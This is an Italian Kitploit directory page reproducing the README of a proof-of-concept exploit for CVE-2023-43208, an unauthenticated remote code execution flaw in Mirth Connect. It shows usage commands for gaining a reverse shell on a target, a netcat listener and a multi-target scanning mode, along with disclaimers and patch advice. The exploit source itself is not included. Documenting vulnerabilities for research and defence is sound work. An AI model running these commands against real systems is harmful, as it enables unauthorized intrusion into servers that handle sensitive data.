Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/mkirahmet/poc-2023-43208
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubmkirahmet/poc-2023-43208

PoC-2023-43208

Un exploit proof-of-concept per CVE-2023-43208, una vulnerabilità di esecuzione remota di codice in Mirth Connect precedente alla versione 4.4.1.

Vedi Repository
35 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-43208-EXPLOIT

Exploit di Remote Code Execution (RCE) su Mirth Connect

Python Version Version CVE Lab Use Only

⚠️ SOLO PER USO DIDATTICO E DI LABORATORIO ⚠️

Una proof-of-concept per CVE-2023-43208, una vulnerabilità di remote code execution in Mirth Connect precedente alla versione 4.4.1.

🚨 IMPORTANTE DISCLAIMER LEGALE

Questo strumento è strettamente destinato a:

  • 🧪 Scopi educativi
  • 🔬 Test di sicurezza autorizzati in ambienti di laboratorio
  • 📚 Ricerca e apprendimento nel campo della cybersecurity

NON USARLO:

  • ❌ Contro sistemi che non possiedi
  • ❌ Senza esplicito permesso scritto
  • ❌ In ambienti di produzione
  • ❌ Per scopi illegali o dannosi

Sei responsabile del rispetto di tutte le leggi e normative applicabili. L'uso improprio di questo strumento può comportare accuse penali.

📋 Descrizione

Questo exploit sfrutta la vulnerabilità di deserializzazione XML nell'endpoint /api/users di Mirth Connect, consentendo l'esecuzione remota di codice non autenticata sulle versioni interessate (< 4.4.1).

Questa è una vulnerabilità CRITICA e dovrebbe essere testata SOLO in ambienti di laboratorio isolati con sistemi di tua proprietà.

🔧 Requisiti

  • Python 3.7 o superiore
  • Pacchetti richiesti elencati in requirements.txt
  • UN AMBIENTE DI LABORATORIO con un'istanza vulnerabile di Mirth Connect

🚀 Installazione

Clona il repository

git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT

Installa i requisiti

pip install -r requirements.txt 💻 Utilizzo (SOLO PER USO IN LABORATORIO) Modalità Interattiva (Consigliata per il Laboratorio) bash python exploit.py Modalità da Riga di Comando bash

Sfruttamento di un singolo target (SOLO PER USO IN LABORATORIO)

python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444

Scansione di più target da file (SOLO PER USO IN LABORATORIO)

python exploit.py -f targets.txt -t 50 -o vulnerable.txt

Modalità non interattiva (SOLO PER USO IN LABORATORIO)

python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive Opzioni text -u, --url URL del target da sfruttare (SOLO PER USO IN LABORATORIO) -lh, --lhost Host in ascolto (il tuo IP) -lp, --lport Porta in ascolto -f, --file File contenente gli URL dei target da scansionare -o, --output File di output per salvare i risultati della scansione -t, --threads Numero di thread per la scansione (default: 50) --no-interactive Esegui in modalità non interattiva 🎯 Esempio di Ambiente di Laboratorio Configura il tuo laboratorio:

Installa la versione vulnerabile di Mirth Connect (< 4.4.1) in una VM isolata

Usa una rete controllata (es. NAT/Host-only in VirtualBox/VMware)

Non esporti mai a internet

Avvia il tuo listener:

ncat -lnvp 4444

or

nc -lnvp 4444 Esegui l'exploit nel tuo laboratorio:

python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444 🧪 Requisiti dell'Ambiente di Test Rete/VLAN isolata

Solo macchine virtuali

Nessun dato di produzione

Regole firewall che bloccano l'accesso esterno

Autorizzazione appropriata documentata

📝 Dettagli Tecnici Tipo di vulnerabilità: RCE tramite deserializzazione XML

Versioni interessate: Mirth Connect < 4.4.1

Versione corretta: 4.4.1 e successive

Punteggio CVSS: 9.8 (Critico)

Vettore di attacco: Rete

Autenticazione: Non richiesta

L'exploit utilizza i gadget di Commons Collections per ottenere RCE attraverso l'endpoint /api/users.

🛡️ Misure di Protezione Se stai eseguendo Mirth Connect:

✅ Aggiorna alla versione 4.4.1 o successiva

✅ Limita l'accesso di rete alle interfacce di amministrazione

✅ Implementa un'autenticazione adeguata

✅ Monitora payload XML sospetti

👥 Crediti Autori originali: K3ysTr0K3R & Chocapikk

Modificato da: M0h4

CVE: CVE-2023-43208

⚠️ AVVERTENZA FINALE

╔══════════════════════════════════════════════════════════════╗ ║ QUESTO STRUMENTO È SOLO PER USO IN LABORATORIO ║ ║ L'uso non autorizzato è ILLEGALE e NON ETICO ║ ║ Ti assumi TUTTI i rischi e le responsabilità ║ ║ L'autore NON si assume NESSUNA responsabilità per l'abuso ║ ╚══════════════════════════════════════════════════════════════╝

Scarica lo strumento